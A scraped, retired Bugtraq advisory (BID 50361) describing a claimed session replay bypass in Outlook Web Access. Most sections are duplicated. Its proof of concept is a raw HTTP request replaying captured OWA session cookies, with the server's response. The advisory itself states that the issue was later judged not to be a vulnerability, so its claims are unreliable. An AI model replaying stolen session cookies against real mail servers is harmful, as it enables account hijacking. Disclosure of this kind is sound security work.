Retired: Microsoft Outlook Web Access Session Replay Security Bypass Vulnerability
BID:50361
Info
Retired: Microsoft Outlook Web Access Session Replay Security Bypass Vulnerability
| Bugtraq ID: | 50361 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 25 2011 12:00AM |
| Updated: | Oct 26 2011 04:42PM |
| Credit: | Asheesh Anaconda |
| Vulnerable: |
Microsoft Outlook Web Access 8.2.254.0 Microsoft Outlook Web Access 0 |
| Not Vulnerable: | |
Discussion
Retired: Microsoft Outlook Web Access Session Replay Security Bypass Vulnerability
Microsoft Outlook Web Access is prone to a security-bypass vulnerability.
Successful exploits may allow attackers to hijack web sessions or bypass authentication through a replay attack and gain access to a victim's email account.
Microsoft Outlook Web Access 8.2.254.0 is vulnerable; other versions may also be affected.
Note: Further analysis reveals that is issue is not a vulnerability; therefore this BID is being retired.
Microsoft Outlook Web Access is prone to a security-bypass vulnerability.
Successful exploits may allow attackers to hijack web sessions or bypass authentication through a replay attack and gain access to a victim's email account.
Microsoft Outlook Web Access 8.2.254.0 is vulnerable; other versions may also be affected.
Note: Further analysis reveals that is issue is not a vulnerability; therefore this BID is being retired.
Exploit / POC
Microsoft Outlook Web Access Session Replay Security Bypass Vulnerability
An attacker can carry out this attack using readily available network utilities.
The following proof of concept is available:
GET /owa/?ae=Folder&t=IPF.Note&a= HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application,
application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, application/x-mfe-ipt,
*/*
Referer: https://www.example.com/owa/
Accept-Language: en-in
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0;
SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR
3.5.30729; FDM; .NET CLR 3.0.30729; .NET4.0C)
Accept-Encoding: gzip, deflate
Host: xxxwebmail.xxx.xxx
Connection: Keep-Alive
Cookie: sessionid=49307edc-0f26-4dae-95f8-02d3dc6ad8a3:000;
cadata="25HxHgvnciGT/BOV1+yiA+HThFiE6kBtFXSjqAF0B5vvPAIKu7PA8tzKUCnW9N4Ao9E1WSzUeA27dLBgx";
UserContext=e8997d6036554ada88a62dc9f2cf65d3
Response:
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 58676
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-OWA-Version: 8.2.254.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Tue, 25 Oct 2011 15:00:01 GMT
An attacker can carry out this attack using readily available network utilities.
The following proof of concept is available:
GET /owa/?ae=Folder&t=IPF.Note&a= HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application,
application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, application/x-mfe-ipt,
*/*
Referer: https://www.example.com/owa/
Accept-Language: en-in
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0;
SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR
3.5.30729; FDM; .NET CLR 3.0.30729; .NET4.0C)
Accept-Encoding: gzip, deflate
Host: xxxwebmail.xxx.xxx
Connection: Keep-Alive
Cookie: sessionid=49307edc-0f26-4dae-95f8-02d3dc6ad8a3:000;
cadata="25HxHgvnciGT/BOV1+yiA+HThFiE6kBtFXSjqAF0B5vvPAIKu7PA8tzKUCnW9N4Ao9E1WSzUeA27dLBgx";
UserContext=e8997d6036554ada88a62dc9f2cf65d3
Response:
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 58676
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-OWA-Version: 8.2.254.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Tue, 25 Oct 2011 15:00:01 GMT
Solution / Fix
Microsoft Outlook Web Access Session Replay Security Bypass Vulnerability
Solution:
Currently we are not aware of any vendor supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Microsoft Outlook Web Access Session Replay Security Bypass Vulnerability
References:
References:
- Microsoft Outlook Homepage (Microsoft )
- Microsoft Outlook Web Access Session Sidejacking/Session Replay Vulnerability (Asheesh Kumar Mani Tripathi)